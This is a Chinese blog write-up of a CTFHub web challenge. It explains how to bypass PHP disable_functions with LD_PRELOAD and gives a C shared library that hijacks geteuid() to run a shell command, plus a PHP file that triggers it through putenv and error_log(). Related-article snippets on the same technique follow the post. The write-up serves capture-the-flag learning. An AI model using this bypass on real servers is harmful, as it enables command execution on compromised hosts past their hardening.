CTFHUB-web进阶LD_PRELOAD

最新推荐文章于 2023-06-18 15:54:21 发布
最新推荐文章于 2023-06-18 15:54:21 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30396927/article/details/117398721
版权

CTFHUB-web进阶LD_PRELOAD

知识点:
LD_PRELOAD是Linux系统的一个环境变量,用于动态库的加载,动态库加载的优先级最高,即加载动态库时先加载LD_PRLOAD,它可以影响程序的运行时的链接(Runtime linker)。LD_PRELOAD的功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。

程序中我们经常要调用一些外部库的函数,以sendmail程序中的geteuid()为例,如果我们有个自定义的geteuid()函数,把它编译成动态库后,通过LD_PRELOAD加载,当程序中调用geteuid()函数时,调用的其实是我们自定义的geteuid()函数。而在PHP中error_log()和mail()函数在传入特定参数时都会调用到sendmail外部程序进而调用外部库的函数geteuid()。

所以我们的思路是:
在已获得webshell但被PHP的disable_function禁用了一些危险函数的命令执行的情况下
1.编写好动态链接库文件并上传到服务器
2.编写PHP文件并上传到服务器,内容为
利用putenv设置LD_PRELOAD为我们的恶意动态链接库文件的路径,然后 配合php的某个函数(例如error_log()或mail()函数)去触发运行动态链接库然后执行我们的恶意动态链接库文件
3.在浏览器去浏览我们写的PHP文件~

原理懂了,现在我们来做题吧~
首先编写动态链接库文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
text.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload() {
        system("tac /flag > result.txt");
}   

int  geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

然后编写PHP

<?php
putenv("LD_PRELOAD=/var/www/html/text.so");//注意路径
error_log("text",1,"","");
?>

然后通过题目提示连上服务器再把编写好的两个文件都上传到服务器并在自己的浏览器访问一下text.php就会发现html目录下多了个文件,打开就可以看到flag啦~
在这里插入图片描述
发现篇挺好文章:https://blog.csdn.net/rfrder/article/details/109078117
如有错误欢迎批评指正~

参考链接:
Bypass disabled_functions一些思路总结
PHP disable_functions Bypass 的方法探究

临-界
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFhub Bypass disable_function LD_PRELOAD
qq_41497476的博客
07-29 735
基本做完了基础题目,开始的题了,第一道题给我整懵了。知识盲区 <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function —— LD_PRELOAD</title> </head> <body> <h1>CTFHub Bypass disable_function —— LD_PRELOAD</h1> <
everybody-root:LD_PRELOAD shim 使未知用户成为 root
06-25
每个人都根 这是一个很小的LD_PRELOAD垫片,如果找不到请求的用户,它会导致getpwnam()和getpwnam_r()返回 root 的信息。 设置 $ make $ LD_PRELOAD= ` pwd ` /everybody-root.so /path/to/exe 为什么? 我需要它,以便我可以说服sshd以 root 用户身份登录,同时将他们请求的登录名传递给 PAM。 我应该用这个吗? 不。 学分和执照 版权所有 (c) 2015 罗伯特·诺里斯。 麻省理工学院执照。 请参阅许可证。
ctfhub -- LD_PRELOAD
最新发布
qq_44640313的博客
06-18 295
在php中的disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用。
从一道ctf题学习LD_PRELOAD绕过函数禁用
m0_62422842的博客
09-13 1547
前两天做了一道ctf题目,遇到比较陌生的知识点,利用LD_PRELOAD环境变量,调用新的程来加载恶意的so文件,执行我们注入程序中的恶意代码,从而绕过函数限制。当然,这么说也比较抽象,后文会详细说明。
CTFHub WP LD_PRELOAD
m0_62879498的博客
04-08 1338
CTFHub WP LD_PRELOAD 在做渗透测试中,有时候会遇到无法执行 shell命令的情况,有可能是php函数 disable_function禁用了危险函数,如dl exec system passthure等等(eval并非PHP函数,需要PHP扩展 Suhosin对其行禁用) disable_function 是php.ini中的一个设置选项,用来禁用php中的某些函数,通常是危险函数。 如果了解过linux动态加载的话,我们就会明白还有一种无法执行 shell命令的情况,那就
ctfhub-web-[LD_PRELOAD]
o3Ev的博客
07-17 1460
ctfhub-web-[LD_PRELOAD] 题目描述: 目标:获取服务器上 /flag 文件中的 flag。需要了解 Linux LD_PRELOAD 环境变量。 CTFHub Bypass disable_function —— LD_PRELOAD 本环境来源于AntSword-Labs <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function —— LD_
LD_PRELOAD劫持
weixin_63231007的博客
12-24 2615
有趣的 LD_PRELOAD
network-emulator:LD_PRELOAD POSIX网络API仿真器
04-14
这是POSIX网络API的仿真器,旨在通过LD_PRELOAD与模糊器一起使用。 模糊器通常与执行网络IO的应用程序不兼容。 一些库方便地支持基于缓冲区的IO,例如。 但是,模糊测试人员很少探索应用程序调用的IO功能的完整...
inotify-mitm:LD_PRELOAD挂钩,用于将网络事件转移到Linux
05-20
使木乃伊化这是尝试挂接inotify调用的实验,...例子make allLD_PRELOAD= $PWD /inotify_hook.so inotifywait -m -r -e modify,attrib,close_write,move,create,delete /tmp 然后在另一个外壳中: touch /tmp/llamas参考
openredir:通过 LD_PRELOAD 重定向文件打开操作
05-31
`LD_PRELOAD`是一个强大的Linux技巧,它允许我们修改或扩展动态链接器的行为。本篇文章将深入探讨`openredir`项目,它是如何利用`LD_PRELOAD`来重定向文件打开操作的。 首先,让我们理解`LD_PRELOAD`的概念。`LD_...
free_checker:使用LD_PRELOAD的简单内存泄漏查找程序(用于C程序)
05-06
**免费检查器(Free Checker)**是一个针对C语言程序的简单内存泄漏检测工具,它巧妙地利用了Linux动态链接器的特性——`LD_PRELOAD`。这个工具的主要目的是帮助程序员定位并解决C语言编程中常见的内存泄漏问题。...
CTFHub技能树 Web详解
weixin_45808483的博客
12-02 2177
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
CTFHub 技能树 LD_PRELOAD
weixin_44732566的博客
03-11 2282
CTFHub 技能树 LD_PRELOAD 百度一下LD_PRELOAD:允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达...
浅谈LD_PRELOAD劫持
errorr0
04-22 1951
LD_PRELOAD劫持
从一道题学习LD_PRELOAD & putenv()
cosmoslin的博客
10-09 658
[极客大挑战 2019]RCE ME 题目分析 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
深入分析 LD_PRELOAD
布袋和尚
07-13 8865
是 系统的一个环境变量,它影响程序的运行时的链接(Runtime linker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。1、程序的链接程序的链接可以分为以下三种静态链接库,在 Linux 下文件名后缀为 ,如 。在编译链接时直接将目标代码加入可执行程序。动态链接库,在 Linux 下是 文件,在编译链接时只需要记录需要链接的号,运行程序时才会
Linux RE----LD_PRELOAD
qq_42192672的博客
10-03 565
最近在学习CTF Wiki,记录一下,用来以后给自己看方便 给个链接:https://ctf-wiki.github.io/ctf-wiki/reverse/linux/ld_preload/ 其实虽然直接接触过64位的一些逆向,但是完全基于Linux的只是来逆向破解还真的没有,一步步来吧 原理(摘自原文) 正常情况下, Linux 动态加载器ld-linux(见man手册ld-linux...
【PHP绕过】LD_PRELOAD bypass disable_functions
4ut15m's blog
03-03 1505
序 不能执行系统命令的webshell是没有灵魂的. LD_PRELOAD 众所周知,代码在编译成程序的时候有一个过程叫做链接-->将所引用的函数与变量链接到可执行程序中.编译过程中将所有的函数库链接完毕叫做静态链接,而动态链接则是编译过程中不行链接操作,在程序运行时再动态的载入函数库.不管是静态链接还是动态链接,目的都很明确,载入函数库. LD_PRELOAD是与载入函数库相关的...
sudo sh -c export LD_PRELOAD=
03-29
Sorry, as an AI language model, I do not have access to the system resources to execute this command. However, the correct syntax for setting the LD_PRELOAD environment variable using the "sudo sh -c" command would be: sudo sh -c 'export LD_PRELOAD=/path/to/shared/library && command-to-execute' Replace "/path/to/shared/library" with the absolute path to the shared library you want to preload, and "command-to-execute" with the command you want to run with that library preloaded.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值